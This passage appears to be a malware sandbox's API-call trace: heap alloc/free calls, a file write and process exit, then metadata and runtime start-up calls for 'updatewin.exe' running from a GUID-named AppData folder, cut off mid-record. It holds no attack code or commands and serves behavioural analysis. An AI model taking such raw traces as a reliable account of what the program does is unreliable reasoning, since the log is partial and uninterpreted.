0x5b0110 [0081.652] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x595500 | out: hHeap=0x580000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6a) returned 0x5b0160 [0081.652] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0110 | out: hHeap=0x580000) returned 1 [0081.652] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x9e) returned 0x5b01d8 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0160 | out: hHeap=0x580000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xec) returned 0x5b0280 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b01d8 | out: hHeap=0x580000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x161) returned 0x5b0110 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0280 | out: hHeap=0x580000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x211) returned 0x5b0280 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0110 | out: hHeap=0x580000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x319) returned 0x5b04a0 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0280 | out: hHeap=0x580000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x4a5) returned 0x5b07c8 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b04a0 | out: hHeap=0x580000) returned 1 [0081.653] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x6f7) returned 0x5b0c78 [0081.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b07c8 | out: hHeap=0x580000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa72) returned 0x5b0110 [0081.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0c78 | out: hHeap=0x580000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xfaa) returned 0x5b2e00 [0081.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b0110 | out: hHeap=0x580000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x17a1) returned 0x5b6bd0 [0081.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2e00 | out: hHeap=0x580000) returned 1 [0081.654] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x235f) returned 0x5b8380 [0081.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b6bd0 | out: hHeap=0x580000) returned 1 [0081.654] WriteFile (in: hFile=0xa0, lpBuffer=0x5b83a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x5b83a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0081.655] CloseHandle (hObject=0xa0) returned 1 [0081.658] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8380 | out: hHeap=0x580000) returned 1 [0081.658] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac118 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac140 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac168 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac190 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac1b8 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac1e0 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac208 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac230 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac258 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac280 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac2a8 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac2d0 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac2f8 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac320 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac348 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac370 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac398 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac3c0 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac3e8 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac410 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac438 | out: hHeap=0x580000) returned 1 [0081.659] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1618 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1640 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1668 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1690 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b16b8 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b16e0 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1708 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1730 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1758 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1780 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b17a8 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b17d0 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b17f8 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1820 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1848 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1870 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1898 | out: hHeap=0x580000) returned 1 [0081.660] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b18c0 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b18e8 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1910 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1938 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1960 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1988 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b19b0 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b19d8 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1a00 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1a28 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1a50 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1a78 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1aa0 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1ac8 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1af0 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1b18 | out: hHeap=0x580000) returned 1 [0081.661] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1b40 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1b68 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1b90 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1bb8 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1be0 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1c08 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1c30 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1c58 | out: hHeap=0x580000) returned 1 [0081.662] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1c80 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1ca8 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1cd0 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1cf8 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1d20 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1d48 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1d70 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1d98 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1dc0 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1e18 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1e40 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1e68 | out: hHeap=0x580000) returned 1 [0081.663] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1e90 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1eb8 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1ee0 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1f08 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1f30 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1f58 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1f80 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1fa8 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1fd0 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b1ff8 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2020 | out: hHeap=0x580000) returned 1 [0081.664] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2048 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2070 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2098 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b20c0 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b20e8 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x595490 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2110 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2138 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2160 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2188 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b21b0 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b21d8 | out: hHeap=0x580000) returned 1 [0081.665] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2200 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2228 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2250 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2278 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b22a0 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b22c8 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b22f0 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2318 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2340 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2368 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2390 | out: hHeap=0x580000) returned 1 [0081.666] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b23b8 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b23e0 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2408 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2430 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2458 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2480 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b24a8 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b24d0 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b24f8 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2520 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2548 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2570 | out: hHeap=0x580000) returned 1 [0081.667] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2598 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b25c0 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2618 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2640 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2668 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2690 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b26b8 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b26e0 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2708 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2730 | out: hHeap=0x580000) returned 1 [0081.668] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2758 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2780 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b27a8 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b27d0 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b27f8 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2820 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2848 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2870 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2898 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b28c0 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b28e8 | out: hHeap=0x580000) returned 1 [0081.669] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2910 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2938 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2960 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2988 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b29b0 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b29d8 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2a00 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2a28 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2a50 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2a78 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b2aa0 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b4e00 | out: hHeap=0x580000) returned 1 [0081.670] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5aeaf8 | out: hHeap=0x580000) returned 1 [0081.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0081.671] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0081.671] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5aa3e8 | out: hHeap=0x580000) returned 1 [0081.672] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5acdc8 | out: hHeap=0x580000) returned 1 [0081.672] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0081.672] GetLastError () returned 0x57 [0081.673] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0081.673] ExitProcess (uExitCode=0x0) [0081.673] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5aad00 | out: hHeap=0x580000) returned 1 [0081.815] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "8" image_name = "updatewin.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe" page_root = "0x32852000" os_pid = "0x778" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x6f8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x7d8 [0080.281] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9bec9480, dwHighDateTime=0x1d5d6b4)) [0080.281] GetCurrentProcessId () returned 0x778 [0080.281] GetCurrentThreadId () returned 0x7d8 [0080.281] GetTickCount () returned 0x1159dc6 [0080.281] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22072929756) returned 1 [0080.296] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0080.296] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1fd0000 [0080.521] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.522] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0080.522] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0080.522] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0080.522] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0080.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.522] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.523] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.523] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.523] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.523] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.524] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.524] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.524] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.525] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.525] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.525] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.525] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x214) returned 0x1fd07d0 [0080.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.526] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.526] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.526] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.527] GetCurrentThreadId () returned 0x7d8 [0080.527] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, 